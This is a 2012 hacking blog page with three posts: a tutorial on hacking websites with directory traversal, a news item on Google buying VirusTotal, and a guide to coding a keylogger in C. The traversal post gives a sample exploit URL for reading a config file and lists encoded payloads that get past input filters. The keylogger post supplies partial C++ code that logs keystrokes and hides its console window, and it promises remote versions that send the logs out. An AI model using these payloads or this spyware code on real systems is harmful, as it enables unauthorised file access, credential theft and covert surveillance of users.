New Post

Rss

Friday, September 14, 2012
Hacking websites using Directory Traversal Attacks | Hackingloops

Hacking websites using Directory Traversal Attacks | Hackingloops

Hacking websites, nowadays has became little bit difficult as developers nowadays are also focusing on OWASP(Open web application security project) top 10 vulnerabilities which hackers normally use to hack websites. Today Hackingloops has came with tutorial on Directory Traversal Attacks (part of top 10 vulnerabilities). So friends lets start our tutorial on Hacking websites using Directory traversal attacks.


Directory is basically a folder where web designer stores his website files( this is with respect to server). By directory traversal attack, i simply mean that hacker is able to navigate between the directories and files stored in those directories(say root which contains all config files, htaccess file, ini file and xquery files(all these files are most sensible files for any website, if any of these files security is not handled properly, then Hacker can own website)). In short by using directory traversal attack, hackers main aim is to get access to sensible file that i have mentioned above. 
Nowadays attackers also use directory traversal attacks to view arbitrary files on web server like SSL private keys and password files.

Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking.

What does ../ or ..\ (dot dot slash) mean  ? 
The ..\ instructs the system to go one directory(or simply called folder) up.
For example, we are at this location C:\Hacking\Hacking Tools\Bugtraq. Now on typing ..\ , we would reach at
C:\Hacking\Hacking Tools.
Again on typing ..\ , we would reach at
C:\Hacking  and so on.

Lets again go at location C:\Hacking\Hacking Tools\Bugtraq. Now suppose we want to access a file abcfile.txt placed in folder Hacking. Just we need to  type ..\..\abcfile.txt . Typing ..\ two times would take us two directories up (that is to directory Hacking) where abcfile.txt is stored.
I hope you got dot dot slash concept. Now lets proceed further..

So as of now, we have complete understanding what directory means and what dot dot slash means. Now lets understand clearly what directory traversal attack means.

Directory Traversal attack is an HTTP(or in simple terms web) exploit or vulnerability which allows attackers or hackers to access restricted directories (most hackers are interested in root directory access ) and execute commands outside of the web server's root directory. The goal of this attack is  to access sensitive files placed on web server by stepping inside root directory using dot dot slash technique. By exploiting a directory traversal vulnerability, an attacker can access files in directories other than the root directory. This can be harmful, since access to restricted files containing passwords or other private information may compromise the web server.

For example, by typing the following URL:

http://www.samplesite.com/sample.php?item=../../../../web-config.php

The attacker or hacker causes sample.php to retrieve the file ../../../../web-config.php and display it in the attacker's or hackers web browser. As i have already told you the character sequence "../" stands for "one directory up". So the string “../../../../web-config.php” therefore means "go four directories up, then down into root directory and retrieve the file web-config.php from there".
The attacker needs to guess how many directories to climb in order to get to the desired directory, but this can be easily done by trial and error.

I have setup a live example on my system to explain this vulnerability to users using tomcat server.
Say i am browsing this page:

Hacking websites using Directory traversal attack image 1
Directory Traversal Attack Sample Image 1

Now i changed test1/about.jsp with ../product.jsp and press enter:

Hacking websites using Directory traversal attack image 2
Directory traversal attack Image 2
Here is the result of above step, we are able to access product.jsp in root folder because this sample was vulnerable to directory traversal attack.

Hacking websites using Directory traversal attack image 3
Directory traversal attack sample image 3
Note:

Some web applications scan query string for dangerous characters such as:
  • ..
  • ..\
  • ../
to prevent directory traversal attack. 
However, the query string is usually URI decoded before use. Therefore these applications are vulnerable to percent encoded directory traversal such as:
  • %2e%2e%2f which translates to ../
  • %2e%2e/ which translates to ../
  • ..%2f which translates to ../
  • %2e%2e%5c which translates to ..\

Also in windows internet explorer Microsoft added Unicode characters support, which introduced a new way of encoding ../ ,causing their attempts at directory traversal prevention to be bypassed.
Multiple percent encoding, such as
  • %c1%1c
  • %c0%af
are translated into / or \ characters.


As a good Ethical Hacker, we must know how to protect these loopholes while designing or securing a new website or existing website. So i will also explain the protective measures on how to protect our website from directory traversal attacks. But for that you all need to wait for my next article :P. 

I hope you all have enjoyed the article. If you have any queries, questions or didn't understand anything, feel free to contact me by comments below or can directly mail your request to lokesh@hackingloops.com.

If you like this article then please comment and if you think something is missing and need to be added, feel free to suggest. Thanks for reading!
Saturday, September 8, 2012
Google buys Virustotal to enhance Security

Google buys Virustotal to enhance Security

Well, don't get shocked but its a truth. Google has bought online malware-scanning firm VirusTotal and is pledging to keep the service open to support security software vendors. It would probably going to be one of the biggest setback to hackers. Because now Google is set to come in security field. Virustotal is one of the biggest online malware scanning website and now its a part of Google.
Google buys VirusTotal to enhance security


"We've worked hard to ensure that the services we offer continually improve. But as a small, resource-constrained company, that can sometimes be challenging," the security firm said in its "Inside VirusTotal's Pants" blog. "So we're delighted that Google, a long-time partner, has acquired VirusTotal. This is great news for you, and bad news for malware generators."
VirusTotal was set up in 2007 and uses over 40 different antivirus engines to scan files and URLs for malware for free. Users can upload small files for checking, or just input a URL, to see if it's on a blacklist, and VirusTotal shares its results with other security vendors to allow them to beef up their defenses.
The computer security industry is unusual in that its members share some of its most valuable data malware signatures with competitors. This ensures that new malware is tramped down quickly and the rising tide of security raises all boats. Even Microsoft shares its data, so Google's confirmation is a good sign for the industry.
Google didn't say how much it is spending to purchase VirusTotal, but it has pledged that it will continue to share information from the service with other vendors. It's not saying how it will be integrating the VirusTotal technology, but safer searching and better malware security for its Apps platform look the most likely bets.
"Security is incredibly important to our users and we've invested many millions of dollars to help keep them safe online," a Google spokeswoman told El Reg. "VirusTotal also has a strong track record in web security, and we're delighted to be able to provide them with the infrastructure they need to ensure that their service continues to improve."
Saturday, September 1, 2012
How to code keylogger in C programming Language

How to code keylogger in C programming Language

How to code keylogger in C programming language : C codechamp has brought you a detailed tutorial on how to write a Keylogger code in C programming.
C program of Keylogger or keystroke loggerKeylogger is a computer program which captures all the key strokes pressed by user in real time. It captures all the keys and write them to some file say log.txt and stores it on computer hard disk. Now sending these logs to emails or FTP address depends upon the type of keylogger that is keylogger is remote keylogger or physical keylogger. Physical keyloggers are useful when you have physical access to that system and can retrieve logs personally. While remote keyloggers can be used from anywhere in the world, the only requirement is that victim must have internet connection. Today we will be writing a C program of Physical keylogger or Keystroke logger which requires physical access of the system. We will be extending our logic in further programs to make it remote keylogger which sends logs to FTP’s and Emails directly. So first of all lets see how simple keylogger program works…

C program of Keylogger or Keystroke logger


Algorithm for writing a Simple Keylogger :
1. Create an Empty log file for storing keylogs.
2. Intercept keys pressed by user using GetAsyncKeyState() function.
3.  Store these intercepted values in file.
4.  Hide the Running Window Dialog to make it undetectable.
5.  Use while loop to make it running in all conditions.
6.  Add Sleep() function to reduce the CPU usage to 0%.

Now let us see the C program of keylogger or keystroke logger which intercepts all the keys pressed by the user and store these pressed keys in log file.

C program of Keylogger or keystroke logger :
#include<iostream>
#include<windows.h>
#include<fstream>
#include<time.h>
using namespace std;

int main()
{
 bool runlogger = true;
 ofstream log;
 //where your logs will be stored
 log.open("C:\\log.txt", ofstream::out);
 //displaying error message when unable to open file
 if(log.fail())
  {
   printf("Error in opening log.txt file\n");
   }
  //Code for hiding running dialog
  HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
  ShowWindow(hideIt,0);
  //Logic for capturing keystokes ........
  ...................
To view the complete C program visit my website on C programming :

C program of Keylogger or keystroke logger | C codechamp

 Bookmark my website for Learning C programming like champs.

Designed by Hackingloops.